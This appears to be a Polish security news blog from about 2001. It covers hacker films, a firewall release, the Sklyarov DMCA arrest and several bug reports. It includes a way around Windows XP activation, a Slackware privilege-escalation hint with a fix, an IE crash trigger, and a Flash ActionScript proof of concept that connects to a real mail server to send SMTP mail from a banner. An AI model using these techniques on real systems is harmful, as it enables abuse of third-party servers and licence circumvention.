Wszystkie posty

hoaxer

Filmoteka

Ostatnio miałem okazję oglądnąć dwa filmy. Filmy niebyle jakie, bo utrzymujące się w tematyce komputeryzacji i świata hackerów. Mowa tu o filmach: Takedown (film oparty na faktach konfliktu hackera Kevina Mitnicka) oraz AntiTrust (do pobrania trailer z filmu), który opisywany był już na łamach naszego serwisu.

[OBRAZ] Takedown (Obława) – Obejrzyj trailer
Oparty na faktach film, ukazujący konflikt między słynnym amerykańskim hackerem Kevinem Mitnickiem (Skeet Ulrich) a reprezentującym rząd, ścigającym go informatykiem Tsutomu Shimomurą (Russell Wong). Wartka akcja, niezłe aktorstwo i trzy miłe, atrakcyjne panie (Angela Featherstone, Amanda Peet i Dorit Sauer). Dobra rozrywka, bez zbędnego intelektualnego bełkotu. W dodatku z mocno podstarzałym Tomem Berengerem w roli drugoplanowej.

– więcej informacji

[OBRAZ] AntiTrust – Obejrzyj trailer
Milo (Ryan Phillippe) ma wszystko, aby jak najlepiej urządzić się w rewolucyjnie rozwijającym się przemyśle komputerowym. Jest komputerowym mistrzem i może zrobić wszystko to czego wszyscy młodzi komputerowi geniusze pragną najbardziej: już w tym momencie rozpocząć swoją karierę. Jednak nie będzie to byle jaki początek. Gabinet Mila mieszczący się w jego garażu wyposażony jest w najbardziej skomplikowane urządzenia, nawet takie, których nie posiadają największe i najbardziej rozwinięte firmy na świecie. Są to miedzy innymi urządzenia, które umożliwiają połączenie wszystkich urządzeń cyfrowej komunikacji w jedno potężne urządzenie. Największym marzeniem Mila jest na stałe wpisać się do historii i opracować taką technologię, która na zawsze zmieni życie wszystkich ludzi. Jednak jeszcze przed rozpoczęciem prac nad swoim pomysłem, Milo dostaje propozycję, której nie jest w stanie odrzucić. Propozycja ta pochodzi od szefa jednej z najpotężniejszych komputerowych korporacji Gary’ego Winstona (Tim Robbins), który jest przy okazji idolem Mila i wzorem, który ten chciałby naśladować. Dlatego, mimo że decyzja o przystąpieniu do zespołu Winstona wiąże się z koniecznością rozstania Mila z jego przyjacielem i partnerem w interesach, Teddym, chłopak skuszony wizją pieniędzy, przywilejów i prestiżu postanawia rozpocząć pracę nad projektami Winstona.

– więcej informacji | Antitrust .pl

Oba te filmy naprawdę gorąco polecam wszystkim tym którzy choć na chwilę lubią oderwać się od świata komputerów…

Na sam koniec, bo zostajemy przecież przy tematyce filmów, przytoczę własne, a zarazem jak często spotykane motto: „Polacy nie gęsi i swój film maja”. Dokładnie chodzi tu o Polski film Janusza Zaorskiego pt.: „Haker”. W rolach głównych zobaczymy młodych aktorów ? Bartosza Obuchowicza, Piotra Miazgę i Kasię Smutniak. Role drugoplanowe reżyser powierzył Bogusławowi Lindzie, Markowi Kondratowi i Pawłowi Delągowi.

– więcej informacji

Zonealarm 2.6.88

Oprogramowanie do ochrony przed atakami hackerów komputerów PC pracujących w sieci lub połączonych z Internetem. W pakiecie znajdują się: Firewall, Application Control, Internet Lock oraz Zones.

Firewall kontroluje dane przesyłane przez łącze. Application Control pozwala decydować o tym, które programy mogą korzystać z Internetu, a które nie. Internet Lock blokuje połączenie z Internetem wtedy, gdy z niego nie korzystamy. Zones kontroluje wszystkie działające programy i ostrzega, gdy program bez uprawnień próbuje połączyć się z Internetem. Zawiera mechanizmy chroniące przed wirusami przesyłanymi pocztą elektroniczną.

Program do pobrania w dziale firewalls

Polowanie na Hackerów

Wczoraj pisałem o hackerach, którzy za swoją pracę opłacani są przez rosyjską mafię. Dzisiejszego dnia agenci FBI dokonali aresztowania rosyjskiego programisty, którego jak się okazało przestępstwem było złamanie zabezpieczeń opracowanych przez firmę Adobe Systems.

Złapany to dość znany pracownik jednej z moskiewskiej firmy softwarowej ElcomSoft – Dmitry Skylarov. Dmitry został zatrzymany w Las Vegas, gdzie odbywa się hakerska konferencja Def Con. Do aresztowania doszło niedługo po wygłoszeniu referatu na temat reklamowanego i rzeczywistego poziomu zabezpieczeń stosowanych do ochrony treści elektronicznych książek. Program Dimitriego – Advanced eBook Processor – umożliwia usunięcie ograniczeń i przekształcenie zabezpieczonych plików do formatu PDF.

Firma Adobe, a właściwie jej pracownicy, postanowili wykorzystać tą okazję i donieśli FBI o możliwości złapania osoby, która pogwałciła kontrowersyjną ustawę Digital Millennium Copyright Act (DMCA), zdaniem wielu faworyzującą duże firmy oraz stosowane przez nie – często nieskuteczne – systemy ochrony danych.

Ów dekoder książek w formacie Adobe eBook, sprzedawany początkowo był za 100 USD, przy czym jest produktem zupełnie legalnym poza USA. Po wniesionych groźbach ze strony firmy Adobe, autorzy postanowili przenieść swą witrynę internetową do Rosji i udostępnić program bezpłatnie. Po kolejnych oskarżeniach doszło wreszcie do użycia sił policyjnych i osadzenia winowajcy w areszcie. Po przeniesieniu Dimitriego do San Francisco czeka go proces, który może się skończyć nawet 500 tysiącami dolarów grzywny i 5-letnim pobytem w więzieniu.

Jeden z czytelników Slashdota komentuje to zdarzenie: „Byłoby to dosyć ironiczne, gdyby obywatel Rosji miał walczyć z amerykańskim prawem, ograniczającym jego wolność słowa”. Wielu hakerów twierdzi, że na podstawie obowiązującego prawa FBI może ścigać niemal każdą osobę, zajmującą się zawodowo komputerowymi systemami zabezpieczeń.

Umarł Windows! Niech żyje Windows!

Zabezpieczenie najnowszego produktu Windows XP giganta z Redmont – aktywacja produktu (Windows Product Activation)miała być jednym z kontrowersyjnych zabezpieczeń. Zabezpieczenie WPA (Windows Product Activation) miało spowodować, że niemożliwe stanie się nielegalne kopiowanie softwaru firmy Microsoft. Jednak tak nie będzie.

Nasi zachodni przyjaciele ujawnili, iż najnowsza wersja WPA oferowana wraz z RC1 jest pełna dziur i może być prawie całkowicie zignorowana.

Aktywacja produktu według niemieckego serwisu Techhannel, jest bardzo prosta do ominięcia, bowiem wszystkie informacje koncentrują się wokół jednego pliku – wpa.dbl, który znajduje się w katalogu System32 systemu Windows XP.

W pliku tym znajdują się informacje dotyczące konfiguracji sprzętowej komputera w momencie aktywacji systemu. Kiedy Windows zarejestruje dokonanie więcej niż trzech zmian w sprzętowej konfiguracji komputera, usuwa opisywany plik. Użytkownik musi następnie aktywować swój system w wyżej opisany sposób. Co więcej – musi to zrobić natychmiast, jeśli XP był zainstalowany ponad 30 dni temu (lub 14 w przypadku RC1).

Cóż więc zrobili niemieccy pracownicy z Tecchnannel? Na początek skopiowali w bezpieczne miejsce plik wpa.dbl. Następnie zaczęli wymieniać poszczególne elementy komputera. Po wymianie dwóch wszystko działało jak należy. Wymiana trzeciego – procesora – również nie powinna wpłynąć na system operacyjny. Okazuje się jednak, że procesor odczytywany jest jako dwa elementy – standardowo jako CPU oraz jego numer seryjny. Nawet wyłączenie w BIOS’ie numeru seryjnego nic nie pomoże.

Tak więc co w tej sytuacji można dalej zrobić? Bardzo proste! Przekopiować z powrotem na swoje miejsce wcześniej zachowany plik konfiguracyjny i wszystko nadal będzie działac.

Jeżeli Microsoft nie dokona żadnych zmian w WPA przed oficjalną premierą Windows XP, implementacja technologii aktywacyjnej WPA stanie się bezsensownym zamiarem.

Hackerzy opłacani przez rosyjską mafię

Jak głosi FBI (Federalne Biuro Śledcze), w ostatnim czasie ponad 40 firm w 40 stanach stało się obiektem ataku hackerów opłacanych przez zorganizowane grupy przestępcze z Europy Wschodniej, którzy pracując dla rosyjskiej mafii coraz częściej atakują amerykańskie banki oraz sklepy internetowe.

Prawdopodobnie wschodni „najemnicy” ukradli już około miliona numerów kart kredytowych.

Według przedstawicieli FBI, ciągłe włamania, przeprowadzane z terenu byłego ZSRR, za które odpowiedzialni są hackerzy opłacani przez rosyjską mafię, stanowią poważne zagrożenie dla amerykańskiej gospodarki, natomiast zdaniem ekspertów, ataki te zdarzają się coraz częściej i są też coraz bardziej trudniejsze do wykrycia oraz odparcia.

Jak twierdzi asystent dyrektora FBI John Collingwood, prawdopodobnie w najbliższym czasie można spodziewać się wzrostu liczb kolejnych ataków, które mogą spowodować ogromne straty w gospodarce USA.

Slackware dziurawy!

W Slackware 8.0 a także w wcześniejszych wersjach, wystepuje poważny błąd w bibliotece man który może przekreślić bezpieczeństwo naszego serwera.

Dokładnie chodzi tu o złe ustawienia praw w /var/man/cat*/ które są standardowo ustawione na chmod 1777. Co nam daje taki błąd? Jak się okazuje dość sporo! Wystarczy, że odpowiednio zmodyfikujemy zmienną export PATH=, aby dostać przywilej root’a.

Aby do tego niedoprowadzić, należy zmienić parametry praw dostępu:

chmod 700 /var/man/cat*

Błąd w Slackware

Błąd dotyczy programu init w Slacku 7.1 i nowszych. Stanowi on zagrożenie dla informacji zapisanych na dysku.

Wykonanie polecenia halt (czyli zatrzymanie systemu), a następnie ponownie halt powoduje, że wszystkie procesy są zatrzymane, jakkolwiek zawartość partycji jest ciągle dostępna.

Próba zapisania czegoś na dysku może doprowadzić do całkowitego uszkodzenia systemu plików.

Jeżeli taka sytuacja ma miejsce, należy zrestartować system
i uruchomic efschk.

Bugów ciąg dalszy

Kolejny bug (?) odkryty przez MagnatLU, ale tym razem w IE 4.0, a dokładnie w pliku URLMON.DLL.

Otoz przy zapisywaniu strony na dysk (przez IE) na samej gorze (przed i za ‚DOCTYPE’) jest wciskany komentarz typu:
<!– saved from url=(####)http://adres.strony.ktora.jest.zapisywana –>
gdzie #### to czterocyfrowa liczba – dlugosc adresu przy otwieraniu stron IE odczytuje ten komentarz (niewiadomo po co) uzywajac prawdopodobnie czegos w stylu ‚sscanf’ bo jak tekst nie bedzie sie zgadzal z formatem „(####)$$$$$$” to przegladarka sie wykrzacczy – czasami poprostu wyskakuje blad i sie zamyka jedno okienko, a czasami nawet wyskakuje Blue Screen of Death. Ciekawe sa efekty umieszczenia tego na pulpicie jako element Active Desktop.

PRZYKLAD:
stworz dowolny plik .html i wpisz w nim tylko

<!– saved from url=cokolwiek –>

a nastepnie odpal go w IE. Niestety niewiem jak reaguja na cos takiego inne wersje tej przegladarki (Netszkapa jest raczej bezpieczna… IE6.0 także – przyp. red.)

Acha – czasami, gdy sie odpowiednio dobierze liczbe, bledzik tez wystepuje. Narazie nie mam informacji co do konkretniejszczego wykorzystania tej „dziurki” (?) – ale mozliwe ze da sie zrobic cos w stylu starych, dobrych exploitow linuxowych.

Flash v5.0 BUG

Jeden z naszych czytelników przesłał informację, dotycząca ciekawego błędu który występuje prawdopodobnie w wersji Flash 5.0

update: Dla zainteresowanych zamieszczam źródło głównego kodu programu

Tak więc zaczynamy:

Prawdopodobnie udalo mi sie znalesc ‚buga’ we flashu (ver. 5) a dokladnie w tworzonych przez niego plikach.
Otoz we flashu jest cos takiego jak XMLSocket – dziala jak zwykly socket pod linuxem / windoza – i ma ograniczenie – nr portu musi byc wiekszy od 1024 (ze zrozumialych przyczyn). Funkcja otwierajaca port (polaczenie wychodzace) przyjmuje jako parametr wartosci longint. Gdy sie do niej wysle wartosc wieksza niz 65535 (max. nr portu) to sie polaczy z portem (nr mod 65535)
Uzywajac tego mozna zrobic we flashu bannerek, ktory przy otwieraniu polaczy sie z serverem np. smtp.poczta.onet.pl na porcie 65535+25 i moze normalnie wyslac m@ila.

– MagnatLU

Źródło głównego kodu programu:

sock = new XMLSocket();
sock.connect( ‚smtp.poczta.onet.pl’, 65536+25 );
sock.send(‚\nHELO strona\n’);
sock.send(‚\nMAIL FROM: \n’);
sock.send(‚\nRCPT TO: \n’);
sock.send(‚\nDATA\n’);
sock.send(‚\nMiales racje, to dziala !!!\n’);
sock.send(‚\n.\n’);
sock.send(‚\nQUIT\n’);
//sock.close()

Przyklad jest bardzo prosty, tylko wysyła dane, nie czeka na odpowiedz serwera, ale z doświadczeń wynika, że to wystarcza przy większości systemów.